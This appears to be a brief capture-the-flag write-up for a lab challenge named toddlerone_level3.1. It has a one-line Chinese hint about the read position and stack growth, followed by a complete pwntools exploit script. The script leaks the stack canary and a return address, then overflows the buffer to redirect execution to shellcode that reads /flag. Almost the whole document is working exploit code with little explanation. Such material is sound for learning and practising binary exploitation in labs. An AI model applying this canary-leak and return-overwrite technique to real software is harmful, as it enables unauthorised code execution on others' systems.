3.1
需要注意两个点,一个是read的位置,一个是每次启动challenge函数后栈的长度变化
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
| from pwn import *
context.log_level='info'
r = process(["/challenge/toddlerone_level3.1"])
payload = asm(shellcraft.amd64.linux.cat('/flag'), arch='amd64')
payload1 = b'REPEAT' + b'a'*(0x28-6-8*2) + b'b'
r.sendlineafter(b'Payload size: ', str(len(payload1)))
r.sendafter(b'bytes)!\n', payload1)
print(r.recvuntil("aaaaaaaab"))
canary = u64(r.recv(7).rjust(8, b'\x00'))
log.success("canary => {}".format(hex(canary)))
payload2 = b'REPEAT' + b'a'*(0x28-6-8) + b'a'*0x10 + b'aaaaaaab'
log.info(str(payload2))
r.sendlineafter(b'Payload size: ', str(len(payload2)))
r.sendafter(b'bytes)!\n', payload2)
r.recvuntil('aaaaaaaab')
ret_addr = u64(r.recvline()[:-1].ljust(8, b'\x00'))
log.success("ret addr => {}".format(hex(ret_addr)))
payload3 = b'aaaaaa' + b'a'*(0x28-6-8*2) + p64(canary) + b'aaaaaaaa' + p64(ret_addr-0x1140-0x70*2+8) + payload
log.info(str(payload3))
r.sendlineafter(b'Payload size: ', str(len(payload3)))
r.sendafter(b'bytes)!\n', payload3)
r.interactive()
|
